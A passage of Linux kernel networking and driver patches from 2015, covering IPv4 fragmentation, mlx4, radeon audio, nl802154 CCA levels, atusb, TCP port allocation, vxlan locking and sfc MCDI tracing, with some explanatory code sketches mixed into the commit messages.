(skb->len > mtu) + if (skb->len > mtu || (IPCB(skb)->flags & IPSKB_FRAG_PMTU)) return ip_fragment(sk, skb, mtu, ip_finish_output2); return ip_finish_output2(sk, skb); @@ -492,7 +492,10 @@ static int ip_fragment(struct sock *sk, struct sk_buff *skb, { struct iphdr *iph = ip_hdr(skb); - if (unlikely(((iph->frag_off & htons(IP_DF)) && !skb->ignore_df) || + if ((iph->frag_off & htons(IP_DF)) == 0) + return ip_do_fragment(sk, skb, output); + + if (unlikely(!skb->ignore_df || (IPCB(skb)->frag_max_size && IPCB(skb)->frag_max_size > mtu))) { struct rtable *rt = skb_rtable(skb); @@ -537,6 +540,8 @@ int ip_do_fragment(struct sock *sk, struct sk_buff *skb, iph = ip_hdr(skb); mtu = ip_skb_dst_mtu(skb); + if (IPCB(skb)->frag_max_size && IPCB(skb)->frag_max_size < mtu) + mtu = IPCB(skb)->frag_max_size; /* * Setup starting values. @@ -732,6 +737,9 @@ int ip_do_fragment(struct sock *sk, struct sk_buff *skb, iph = ip_hdr(skb2); iph->frag_off = htons((offset >> 3)); + if (IPCB(skb)->flags & IPSKB_FRAG_PMTU) + iph->frag_off |= htons(IP_DF); + /* ANK: dirty, but effective trick. Upgrade options only if * the segment to be fragmented was THE FIRST (otherwise, * options are already fixed) and make it ONCE From f4ecf29fd78d19a9301e638eaa1419e5c8fbdce1 Mon Sep 17 00:00:00 2001 From: Benjamin Poirier Date: Fri, 22 May 2015 16:12:26 -0700 Subject: [PATCH 303/872] mlx4_core: Fix fallback from MSI-X to INTx The test in mlx4_load_one() to remove MLX4_FLAG_MSI_X expects mlx4_NOP() to fail with -EBUSY. It is also necessary to avoid the reset since the device is not fully reinitialized before calling mlx4_start_hca() a second time. Note that this will also affect mlx4_test_interrupts(), the only other user of MLX4_CMD_NOP. Fixes: f5aef5a ("net/mlx4_core: Activate reset flow upon fatal command cases") Signed-off-by: Benjamin Poirier Signed-off-by: David S. 
Miller --- drivers/net/ethernet/mellanox/mlx4/cmd.c | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/cmd.c b/drivers/net/ethernet/mellanox/mlx4/cmd.c index 4f7dc044601e..529ef0594b90 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx4/cmd.c @@ -714,8 +714,13 @@ static int mlx4_cmd_wait(struct mlx4_dev *dev, u64 in_param, u64 *out_param, msecs_to_jiffies(timeout))) { mlx4_warn(dev, "command 0x%x timed out (go bit not cleared)\n", op); - err = -EIO; - goto out_reset; + if (op == MLX4_CMD_NOP) { + err = -EBUSY; + goto out; + } else { + err = -EIO; + goto out_reset; + } } err = context->result; From fbfd3bc7dfd7efcad2d2e52bf634f84c80a77a35 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 27 May 2015 11:33:26 -0400 Subject: [PATCH 304/872] drm/radeon/audio: make sure connector is valid in hotplug case Avoids a crash when a monitor is hotplugged and the encoder and connector are not linked yet. bug: https://bugs.freedesktop.org/show_bug.cgi?id=90681 Signed-off-by: Alex Deucher Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/evergreen_hdmi.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/gpu/drm/radeon/evergreen_hdmi.c b/drivers/gpu/drm/radeon/evergreen_hdmi.c index 0926739c9fa7..9953356fe263 100644 --- a/drivers/gpu/drm/radeon/evergreen_hdmi.c +++ b/drivers/gpu/drm/radeon/evergreen_hdmi.c @@ -400,7 +400,7 @@ void evergreen_hdmi_enable(struct drm_encoder *encoder, bool enable) if (enable) { struct drm_connector *connector = radeon_get_connector_for_encoder(encoder); - if (drm_detect_monitor_audio(radeon_connector_edid(connector))) { + if (connector && drm_detect_monitor_audio(radeon_connector_edid(connector))) { WREG32(HDMI_INFOFRAME_CONTROL0 + dig->afmt->offset, HDMI_AVI_INFO_SEND | /* enable AVI info frames */ HDMI_AVI_INFO_CONT | /* required for audio info values to be updated */ @@ -438,7 +438,8 @@ void evergreen_dp_enable(struct drm_encoder *encoder, bool enable) if (!dig || !dig->afmt) return; - if (enable && drm_detect_monitor_audio(radeon_connector_edid(connector))) { + if (enable && connector && + drm_detect_monitor_audio(radeon_connector_edid(connector))) { struct drm_connector *connector = radeon_get_connector_for_encoder(encoder); struct radeon_connector *radeon_connector = to_radeon_connector(connector); struct radeon_connector_atom_dig *dig_connector; From e4390592a4fc3ee10a8bc4742197fdbac3935f74 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 27 May 2015 13:42:09 +0200 Subject: [PATCH 305/872] nl802154: add support for cca ed level info This patch adds information about the current cca ed level when the phy is dumped over nl802154. 
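For context beyond the one-line description above, here is a minimal, hypothetical driver-side sketch of what a PHY has to advertise for this attribute to appear in the dump. The helper name and the threshold values are invented for illustration; the wpan_phy fields and the WPAN_PHY_FLAG_CCA_ED_LEVEL capability flag are the ones consumed by nl802154_send_wpan_phy() in the diff below and by the follow-up set_cca_ed_level patch:

#include <linux/kernel.h>	/* ARRAY_SIZE */
#include <net/cfg802154.h>	/* struct wpan_phy, WPAN_PHY_FLAG_CCA_ED_LEVEL */

/* Example CCA energy-detection thresholds; the numbers are made up. */
static const s32 example_cca_ed_levels[] = { -77, -74, -71 };

/* Hypothetical probe-time helper: advertise the supported levels, the
 * current level and the capability flag so that the nl802154 dump code
 * includes NL802154_ATTR_CCA_ED_LEVEL for this phy.
 */
static void example_advertise_cca_ed_level(struct wpan_phy *phy)
{
	phy->supported.cca_ed_levels = example_cca_ed_levels;
	phy->supported.cca_ed_levels_size = ARRAY_SIZE(example_cca_ed_levels);
	phy->cca_ed_level = example_cca_ed_levels[0];
	phy->flags |= WPAN_PHY_FLAG_CCA_ED_LEVEL;
}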
Signed-off-by: Alexander Aring Reviewed-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 5c9d524ba02c..a89d9d024126 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -211,6 +211,7 @@ static const struct nla_policy nl802154_policy[NL802154_ATTR_MAX+1] = { [NL802154_ATTR_CCA_MODE] = { .type = NLA_U32, }, [NL802154_ATTR_CCA_OPT] = { .type = NLA_U32, }, + [NL802154_ATTR_CCA_ED_LEVEL] = { .type = NLA_S32, }, [NL802154_ATTR_SUPPORTED_CHANNEL] = { .type = NLA_U32, }, @@ -421,6 +422,12 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; } + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_ED_LEVEL) { + if (nla_put_s32(msg, NL802154_ATTR_CCA_ED_LEVEL, + rdev->wpan_phy.cca_ed_level)) + goto nla_put_failure; + } + if (nl802154_put_capabilities(msg, rdev)) goto nla_put_failure; From b69644c1c72e179738dd5c7e52e99d8550189472 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 27 May 2015 13:42:10 +0200 Subject: [PATCH 306/872] nl802154: add support to set cca ed level This patch adds support for setting the current cca ed level value over nl802154. Signed-off-by: Alexander Aring Reviewed-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 1 + net/ieee802154/nl802154.c | 30 ++++++++++++++++++++++++++++++ net/ieee802154/rdev-ops.h | 11 +++++++++++ net/ieee802154/trace.h | 15 +++++++++++++++ net/mac802154/cfg.c | 19 +++++++++++++++++++ 5 files changed, 76 insertions(+) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 2e3bb012c2ff..290a9a69af07 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -44,6 +44,7 @@ struct cfg802154_ops { int (*set_channel)(struct wpan_phy *wpan_phy, u8 page, u8 channel); int (*set_cca_mode)(struct wpan_phy *wpan_phy, const struct wpan_phy_cca *cca); + int (*set_cca_ed_level)(struct wpan_phy *wpan_phy, s32 ed_level); int (*set_tx_power)(struct wpan_phy *wpan_phy, s32 power); int (*set_pan_id)(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 pan_id); diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index a89d9d024126..7dbb1f4ce7df 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -790,6 +790,28 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) return rdev_set_cca_mode(rdev, &cca); } +static int nl802154_set_cca_ed_level(struct sk_buff *skb, struct genl_info *info) +{ + struct cfg802154_registered_device *rdev = info->user_ptr[0]; + s32 ed_level; + int i; + + if (!(rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_ED_LEVEL)) + return -EOPNOTSUPP; + + if (!info->attrs[NL802154_ATTR_CCA_ED_LEVEL]) + return -EINVAL; + + ed_level = nla_get_s32(info->attrs[NL802154_ATTR_CCA_ED_LEVEL]); + + for (i = 0; i < rdev->wpan_phy.supported.cca_ed_levels_size; i++) { + if (ed_level == rdev->wpan_phy.supported.cca_ed_levels[i]) + return rdev_set_cca_ed_level(rdev, ed_level); + } + + return -EINVAL; +} + static int nl802154_set_tx_power(struct sk_buff *skb, struct genl_info *info) { struct cfg802154_registered_device *rdev = info->user_ptr[0]; @@ -1122,6 +1144,14 @@ static const struct genl_ops nl802154_ops[] = { .internal_flags = NL802154_FLAG_NEED_WPAN_PHY | NL802154_FLAG_NEED_RTNL, }, + { + .cmd = NL802154_CMD_SET_CCA_ED_LEVEL, + .doit = nl802154_set_cca_ed_level, + .policy = nl802154_policy, + .flags = GENL_ADMIN_PERM, + .internal_flags = 
NL802154_FLAG_NEED_WPAN_PHY | + NL802154_FLAG_NEED_RTNL, + }, { .cmd = NL802154_CMD_SET_TX_POWER, .doit = nl802154_set_tx_power, diff --git a/net/ieee802154/rdev-ops.h b/net/ieee802154/rdev-ops.h index 36456118a6ec..b2155a123f6c 100644 --- a/net/ieee802154/rdev-ops.h +++ b/net/ieee802154/rdev-ops.h @@ -74,6 +74,17 @@ rdev_set_cca_mode(struct cfg802154_registered_device *rdev, return ret; } +static inline int +rdev_set_cca_ed_level(struct cfg802154_registered_device *rdev, s32 ed_level) +{ + int ret; + + trace_802154_rdev_set_cca_ed_level(&rdev->wpan_phy, ed_level); + ret = rdev->ops->set_cca_ed_level(&rdev->wpan_phy, ed_level); + trace_802154_rdev_return_int(&rdev->wpan_phy, ret); + return ret; +} + static inline int rdev_set_tx_power(struct cfg802154_registered_device *rdev, s32 power) diff --git a/net/ieee802154/trace.h b/net/ieee802154/trace.h index ac790bb1b4fe..73eb7605c1eb 100644 --- a/net/ieee802154/trace.h +++ b/net/ieee802154/trace.h @@ -123,6 +123,21 @@ TRACE_EVENT(802154_rdev_set_cca_mode, WPAN_CCA_PR_ARG) ); +TRACE_EVENT(802154_rdev_set_cca_ed_level, + TP_PROTO(struct wpan_phy *wpan_phy, s32 ed_level), + TP_ARGS(wpan_phy, ed_level), + TP_STRUCT__entry( + WPAN_PHY_ENTRY + __field(s32, ed_level) + ), + TP_fast_assign( + WPAN_PHY_ASSIGN; + __entry->ed_level = ed_level; + ), + TP_printk(WPAN_PHY_PR_FMT ", ed_level: %d", WPAN_PHY_PR_ARG, + __entry->ed_level) +); + DECLARE_EVENT_CLASS(802154_le16_template, TP_PROTO(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 le16arg), diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index ab12fa296eb3..317c4662e544 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -105,6 +105,24 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, return ret; } +static int +ieee802154_set_cca_ed_level(struct wpan_phy *wpan_phy, s32 ed_level) +{ + struct ieee802154_local *local = wpan_phy_priv(wpan_phy); + int ret; + + ASSERT_RTNL(); + + if (wpan_phy->cca_ed_level == ed_level) + return 0; + + ret = drv_set_cca_ed_level(local, ed_level); + if (!ret) + wpan_phy->cca_ed_level = ed_level; + + return ret; +} + static int ieee802154_set_tx_power(struct wpan_phy *wpan_phy, s32 power) { @@ -213,6 +231,7 @@ const struct cfg802154_ops mac802154_config_ops = { .del_virtual_intf = ieee802154_del_iface, .set_channel = ieee802154_set_channel, .set_cca_mode = ieee802154_set_cca_mode, + .set_cca_ed_level = ieee802154_set_cca_ed_level, .set_tx_power = ieee802154_set_tx_power, .set_pan_id = ieee802154_set_pan_id, .set_short_addr = ieee802154_set_short_addr, From b5a61c306b0dddb28e3a3ab5d782c73e5f665497 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 27 May 2015 14:11:28 +0200 Subject: [PATCH 307/872] atusb: add support for at86rf230 This patch adds support for the at86rf230 version check which is used by the rzusb stick. 
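As a purely illustrative aside (not part of the driver), the widened check below can be read as a two-entry whitelist of transceiver part numbers. The helper is hypothetical; the part 2 -> AT86RF230 mapping follows this patch, while treating part 3 as the AT86RF231 used on the original ATUSB hardware is an assumption:

#include <linux/types.h>	/* u8 */

/* Hypothetical helper mapping the PART_NUM register value to a chip name;
 * returns NULL for unsupported transceivers.  Part 2 follows this patch
 * (AT86RF230, e.g. on the RZUSBSTICK); part 3 as AT86RF231 is assumed.
 */
static const char *atusb_part_name(u8 part_num)
{
	switch (part_num) {
	case 2:
		return "AT86RF230";
	case 3:
		return "AT86RF231";
	default:
		return NULL;
	}
}

A probe routine could then reject the device whenever the helper returns NULL instead of open-coding the comparison, which keeps future part numbers easy to add.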
Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index 1e18774240b2..5b6bb9adf9ae 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -515,7 +515,7 @@ static int atusb_get_and_show_chip(struct atusb *atusb) man_id_1, man_id_0); goto fail; } - if (part_num != 3) { + if (part_num != 3 && part_num != 2) { dev_err(&usb_dev->dev, "unexpected transceiver, part 0x%02x version 0x%02x\n", part_num, version_num); From 07f4c90062f8fc7c8c26f8f95324cbe8fa3145a5 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Sun, 24 May 2015 14:49:35 -0700 Subject: [PATCH 308/872] tcp/dccp: try to not exhaust ip_local_port_range in connect() A long standing problem on busy servers is the tiny available TCP port range (/proc/sys/net/ipv4/ip_local_port_range) and the default sequential allocation of source ports in connect() system call. If a host is having a lot of active TCP sessions, chances are very high that all ports are in use by at least one flow, and subsequent bind(0) attempts fail, or have to scan a big portion of space to find a slot. In this patch, I changed the starting point in __inet_hash_connect() so that we try to favor even [1] ports, leaving odd ports for bind() users. We still perform a sequential search, so there is no guarantee, but if connect() targets are very different, end result is we leave more ports available to bind(), and we spread them all over the range, lowering time for both connect() and bind() to find a slot. This strategy only works well if /proc/sys/net/ipv4/ip_local_port_range is even, ie if start/end values have different parity. Therefore, default /proc/sys/net/ipv4/ip_local_port_range was changed to 32768 - 60999 (instead of 32768 - 61000) There is no change on security aspects here, only some poor hashing schemes could be eventually impacted by this change. [1] : The odd/even property depends on ip_local_port_range values parity Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- Documentation/networking/ip-sysctl.txt | 8 +++++--- net/ipv4/af_inet.c | 2 +- net/ipv4/inet_hashtables.c | 10 ++++++++-- 3 files changed, 14 insertions(+), 6 deletions(-) diff --git a/Documentation/networking/ip-sysctl.txt b/Documentation/networking/ip-sysctl.txt index cb083e0d682c..5fae7704daab 100644 --- a/Documentation/networking/ip-sysctl.txt +++ b/Documentation/networking/ip-sysctl.txt @@ -751,8 +751,10 @@ IP Variables: ip_local_port_range - 2 INTEGERS Defines the local port range that is used by TCP and UDP to choose the local port. The first number is the first, the - second the last local port number. The default values are - 32768 and 61000 respectively. + second the last local port number. + If possible, it is better these numbers have different parity. + (one even and one odd values) + The default values are 32768 and 60999 respectively. 
ip_local_reserved_ports - list of comma separated ranges Specify the ports which are reserved for known third-party @@ -775,7 +777,7 @@ ip_local_reserved_ports - list of comma separated ranges ip_local_port_range, e.g.: $ cat /proc/sys/net/ipv4/ip_local_port_range - 32000 61000 + 32000 60999 $ cat /proc/sys/net/ipv4/ip_local_reserved_ports 8080,9148 diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c index 235d36afece3..6ad0f7a711c9 100644 --- a/net/ipv4/af_inet.c +++ b/net/ipv4/af_inet.c @@ -1595,7 +1595,7 @@ static __net_init int inet_init_net(struct net *net) */ seqlock_init(&net->ipv4.ip_local_ports.lock); net->ipv4.ip_local_ports.range[0] = 32768; - net->ipv4.ip_local_ports.range[1] = 61000; + net->ipv4.ip_local_ports.range[1] = 60999; seqlock_init(&net->ipv4.ping_group_range.lock); /* diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c index 185efef0f125..1b336dc179f8 100644 --- a/net/ipv4/inet_hashtables.c +++ b/net/ipv4/inet_hashtables.c @@ -502,8 +502,14 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row, inet_get_local_port_range(net, &low, &high); remaining = (high - low) + 1; + /* By starting with offset being an even number, + * we tend to leave about 50% of ports for other uses, + * like bind(0). + */ + offset &= ~1; + local_bh_disable(); - for (i = 1; i <= remaining; i++) { + for (i = 0; i < remaining; i++) { port = low + (i + offset) % remaining; if (inet_is_local_reserved_port(net, port)) continue; @@ -547,7 +553,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row, return -EADDRNOTAVAIL; ok: - hint += i; + hint += (i + 2) & ~1; /* Head lock still held and bh's disabled */ inet_bind_hash(sk, tb, port); From 14e1d0fa97f821b42e8683500cf4ec817bb5d940 Mon Sep 17 00:00:00 2001 From: Sorin Dumitru Date: Tue, 26 May 2015 10:42:04 +0300 Subject: [PATCH 309/872] vxlan: release lock after each bucket in vxlan_cleanup We're seeing some softlockups from this function when there are a lot fdb entries on a vxlan device. Taking the lock for each bucket instead of the whole table is enough to fix that. Signed-off-by: Sorin Dumitru Signed-off-by: David S. Miller --- drivers/net/vxlan.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/net/vxlan.c b/drivers/net/vxlan.c index 5eddbc02c6c2..34c519eb1db5 100644 --- a/drivers/net/vxlan.c +++ b/drivers/net/vxlan.c @@ -2131,9 +2131,10 @@ static void vxlan_cleanup(unsigned long arg) if (!netif_running(vxlan->dev)) return; - spin_lock_bh(&vxlan->hash_lock); for (h = 0; h < FDB_HASH_SIZE; ++h) { struct hlist_node *p, *n; + + spin_lock_bh(&vxlan->hash_lock); hlist_for_each_safe(p, n, &vxlan->fdb_head[h]) { struct vxlan_fdb *f = container_of(p, struct vxlan_fdb, hlist); @@ -2152,8 +2153,8 @@ static void vxlan_cleanup(unsigned long arg) } else if (time_before(timeout, next_timer)) next_timer = timeout; } + spin_unlock_bh(&vxlan->hash_lock); } - spin_unlock_bh(&vxlan->hash_lock); mod_timer(&vxlan->age_timer, next_timer); } From 75aba2a52d955e6721b798600b115c9d73d8995c Mon Sep 17 00:00:00 2001 From: Edward Cree Date: Wed, 27 May 2015 13:13:54 +0100 Subject: [PATCH 310/872] sfc: add tracing of MCDI commands MCDI tracing is conditional on CONFIG_SFC_MCDI_LOGGING, which is enabled by default. Each MCDI command will produce a console line like sfc dom:bus:dev:fn ifname: MCDI RPC REQ: xxxxxxxx [yyyyyyyy...] where xxxxxxxx etc. are the raw MCDI payload in 32-bit hex chunks. 
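As a rough sketch, condensed from the mcdi.c hunk further below into a standalone helper purely for illustration (the helper name is invented, the other identifiers are taken from the patch), the request line is built by appending each 32-bit word as " %08x" to a page-sized scratch buffer:

/* Illustrative only: dump the MCDI header and request payload, one
 * 32-bit word at a time, into a page-sized buffer and emit it as a
 * single "MCDI RPC REQ:" line.
 */
static void example_mcdi_trace_req(struct efx_nic *efx, char *buf,
				   const efx_dword_t *hdr, size_t hdr_len,
				   const efx_dword_t *inbuf, size_t inlen)
{
	int bytes = 0;
	int i;

	for (i = 0; i < hdr_len / 4 && bytes < PAGE_SIZE; i++)
		bytes += snprintf(buf + bytes, PAGE_SIZE - bytes,
				  " %08x", le32_to_cpu(hdr[i].u32[0]));
	for (i = 0; i < inlen / 4 && bytes < PAGE_SIZE; i++)
		bytes += snprintf(buf + bytes, PAGE_SIZE - bytes,
				  " %08x", le32_to_cpu(inbuf[i].u32[0]));

	netif_info(efx, hw, efx->net_dev, "MCDI RPC REQ:%s\n", buf);
}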
The response will then produce a similar line with "RESP" instead of "REQ", and containing the MCDI response payload (if any). Signed-off-by: Edward Cree Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/Kconfig | 8 +++ drivers/net/ethernet/sfc/ef10.c | 3 ++ drivers/net/ethernet/sfc/mcdi.c | 91 ++++++++++++++++++++++++++++++-- drivers/net/ethernet/sfc/mcdi.h | 4 ++ 4 files changed, 102 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/sfc/Kconfig b/drivers/net/ethernet/sfc/Kconfig index 088921294448..c4ba42b1923f 100644 --- a/drivers/net/ethernet/sfc/Kconfig +++ b/drivers/net/ethernet/sfc/Kconfig @@ -36,3 +36,11 @@ config SFC_SRIOV This enables support for the SFC9000 I/O Virtualization features, allowing accelerated network performance in virtualized environments. +config SFC_MCDI_LOGGING + bool "Solarflare SFC9000/SFC9100-family MCDI logging support" + depends on SFC + default y + ---help--- + This enables support for tracing of MCDI (Management-Controller-to- + Driver-Interface) commands and responses, allowing debugging of + driver/firmware interaction. diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index a547cebff4e2..4eb6ab748f06 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -267,6 +267,9 @@ static int efx_ef10_probe(struct efx_nic *efx) return -ENOMEM; efx->nic_data = nic_data; + /* we assume later that we can copy from this buffer in dwords */ + BUILD_BUG_ON(MCDI_CTL_SDU_LEN_MAX_V2 % 4); + rc = efx_nic_alloc_buffer(efx, &nic_data->mcdi_buf, 8 + MCDI_CTL_SDU_LEN_MAX_V2, GFP_KERNEL); if (rc) diff --git a/drivers/net/ethernet/sfc/mcdi.c b/drivers/net/ethernet/sfc/mcdi.c index 8267a1c75771..31eda3255966 100644 --- a/drivers/net/ethernet/sfc/mcdi.c +++ b/drivers/net/ethernet/sfc/mcdi.c @@ -58,14 +58,20 @@ int efx_mcdi_init(struct efx_nic *efx) { struct efx_mcdi_iface *mcdi; bool already_attached; - int rc; + int rc = -ENOMEM; efx->mcdi = kzalloc(sizeof(*efx->mcdi), GFP_KERNEL); if (!efx->mcdi) - return -ENOMEM; + goto fail; mcdi = efx_mcdi(efx); mcdi->efx = efx; +#ifdef CONFIG_SFC_MCDI_LOGGING + /* consuming code assumes buffer is page-sized */ + mcdi->logging_buffer = (char *)__get_free_page(GFP_KERNEL); + if (!mcdi->logging_buffer) + goto fail1; +#endif init_waitqueue_head(&mcdi->wq); spin_lock_init(&mcdi->iface_lock); mcdi->state = MCDI_STATE_QUIESCENT; @@ -81,7 +87,7 @@ int efx_mcdi_init(struct efx_nic *efx) /* Recover from a failed assertion before probing */ rc = efx_mcdi_handle_assertion(efx); if (rc) - return rc; + goto fail2; /* Let the MC (and BMC, if this is a LOM) know that the driver * is loaded. We should do this before we reset the NIC. 
@@ -90,7 +96,7 @@ int efx_mcdi_init(struct efx_nic *efx) if (rc) { netif_err(efx, probe, efx->net_dev, "Unable to register driver with MCPU\n"); - return rc; + goto fail2; } if (already_attached) /* Not a fatal error */ @@ -102,6 +108,15 @@ int efx_mcdi_init(struct efx_nic *efx) efx->primary = efx; return 0; +fail2: +#ifdef CONFIG_SFC_MCDI_LOGGING + free_page((unsigned long)mcdi->logging_buffer); +fail1: +#endif + kfree(efx->mcdi); + efx->mcdi = NULL; +fail: + return rc; } void efx_mcdi_fini(struct efx_nic *efx) @@ -114,6 +129,10 @@ void efx_mcdi_fini(struct efx_nic *efx) /* Relinquish the device (back to the BMC, if this is a LOM) */ efx_mcdi_drv_attach(efx, false, NULL); +#ifdef CONFIG_SFC_MCDI_LOGGING + free_page((unsigned long)efx->mcdi->iface.logging_buffer); +#endif + kfree(efx->mcdi); } @@ -121,6 +140,9 @@ static void efx_mcdi_send_request(struct efx_nic *efx, unsigned cmd, const efx_dword_t *inbuf, size_t inlen) { struct efx_mcdi_iface *mcdi = efx_mcdi(efx); +#ifdef CONFIG_SFC_MCDI_LOGGING + char *buf = mcdi->logging_buffer; /* page-sized */ +#endif efx_dword_t hdr[2]; size_t hdr_len; u32 xflags, seqno; @@ -165,6 +187,31 @@ static void efx_mcdi_send_request(struct efx_nic *efx, unsigned cmd, hdr_len = 8; } +#ifdef CONFIG_SFC_MCDI_LOGGING + if (!WARN_ON_ONCE(!buf)) { + int bytes = 0; + int i; + /* Lengths should always be a whole number of dwords, so scream + * if they're not. + */ + WARN_ON_ONCE(hdr_len % 4); + WARN_ON_ONCE(inlen % 4); + + /* We own the logging buffer, as only one MCDI can be in + * progress on a NIC at any one time. So no need for locking. + */ + for (i = 0; i < hdr_len / 4 && bytes < PAGE_SIZE; i++) + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(hdr[i].u32[0])); + + for (i = 0; i < inlen / 4 && bytes < PAGE_SIZE; i++) + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(inbuf[i].u32[0])); + + netif_info(efx, hw, efx->net_dev, "MCDI RPC REQ:%s\n", buf); + } +#endif + efx->type->mcdi_request(efx, hdr, hdr_len, inbuf, inlen); mcdi->new_epoch = false; @@ -206,6 +253,9 @@ static void efx_mcdi_read_response_header(struct efx_nic *efx) { struct efx_mcdi_iface *mcdi = efx_mcdi(efx); unsigned int respseq, respcmd, error; +#ifdef CONFIG_SFC_MCDI_LOGGING + char *buf = mcdi->logging_buffer; /* page-sized */ +#endif efx_dword_t hdr; efx->type->mcdi_read_response(efx, &hdr, 0, 4); @@ -223,6 +273,39 @@ static void efx_mcdi_read_response_header(struct efx_nic *efx) EFX_DWORD_FIELD(hdr, MC_CMD_V2_EXTN_IN_ACTUAL_LEN); } +#ifdef CONFIG_SFC_MCDI_LOGGING + if (!WARN_ON_ONCE(!buf)) { + size_t hdr_len, data_len; + int bytes = 0; + int i; + + WARN_ON_ONCE(mcdi->resp_hdr_len % 4); + hdr_len = mcdi->resp_hdr_len / 4; + /* MCDI_DECLARE_BUF ensures that underlying buffer is padded + * to dword size, and the MCDI buffer is always dword size + */ + data_len = DIV_ROUND_UP(mcdi->resp_data_len, 4); + + /* We own the logging buffer, as only one MCDI can be in + * progress on a NIC at any one time. So no need for locking. 
+ */ + for (i = 0; i < hdr_len && bytes < PAGE_SIZE; i++) { + efx->type->mcdi_read_response(efx, &hdr, (i * 4), 4); + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(hdr.u32[0])); + } + + for (i = 0; i < data_len && bytes < PAGE_SIZE; i++) { + efx->type->mcdi_read_response(efx, &hdr, + mcdi->resp_hdr_len + (i * 4), 4); + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(hdr.u32[0])); + } + + netif_info(efx, hw, efx->net_dev, "MCDI RPC RESP:%s\n", buf); + } +#endif + if (error && mcdi->resp_data_len == 0) { netif_err(efx, hw, efx->net_dev, "MC rebooted\n"); mcdi->resprc = -EIO; diff --git a/drivers/net/ethernet/sfc/mcdi.h b/drivers/net/ethernet/sfc/mcdi.h index 7afab2fff4fe..b783a2dff80f 100644 --- a/drivers/net/ethernet/sfc/mcdi.h +++ b/drivers/net/ethernet/sfc/mcdi.h @@ -58,6 +58,7 @@ enum efx_mcdi_mode { * enabled * @async_list: Queue of asynchronous requests * @async_timer: Timer for asynchronous request timeout + * @logging_buffer: buffer that may be used to build MCDI tracing messages */ struct efx_mcdi_iface { struct efx_nic *efx; @@ -74,6 +75,9 @@ struct efx_mcdi_iface { spinlock_t async_lock; struct list_head async_list; struct timer_list async_timer; +#ifdef CONFIG_SFC_MCDI_LOGGING + char *logging_buffer; +#endif }; struct efx_mcdi_mon { From e7fef9b45ae188066bb6eb3dde8310d33c2f7d5e Mon Sep 17 00:00:00 2001 From: Edward Cree Date: Wed, 27 May 2015 13:14:01 +0100 Subject: [PATCH 311/872] sfc: add sysfs entry to control MCDI tracing MCDI tracing is enabled per-function with a sysfs file /sys/class/net//device/mcdi_logging Signed-off-by: Edward Cree Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/Kconfig | 3 +- drivers/net/ethernet/sfc/efx.c | 49 +++++++++++++++++++++++++++----- drivers/net/ethernet/sfc/mcdi.c | 4 +-- drivers/net/ethernet/sfc/mcdi.h | 2 ++ 4 files changed, 48 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/sfc/Kconfig b/drivers/net/ethernet/sfc/Kconfig index c4ba42b1923f..4dd92b7b80f4 100644 --- a/drivers/net/ethernet/sfc/Kconfig +++ b/drivers/net/ethernet/sfc/Kconfig @@ -43,4 +43,5 @@ config SFC_MCDI_LOGGING ---help--- This enables support for tracing of MCDI (Management-Controller-to- Driver-Interface) commands and responses, allowing debugging of - driver/firmware interaction. + driver/firmware interaction. The tracing is actually enabled by + a sysfs file 'mcdi_logging' under the PCI device. 
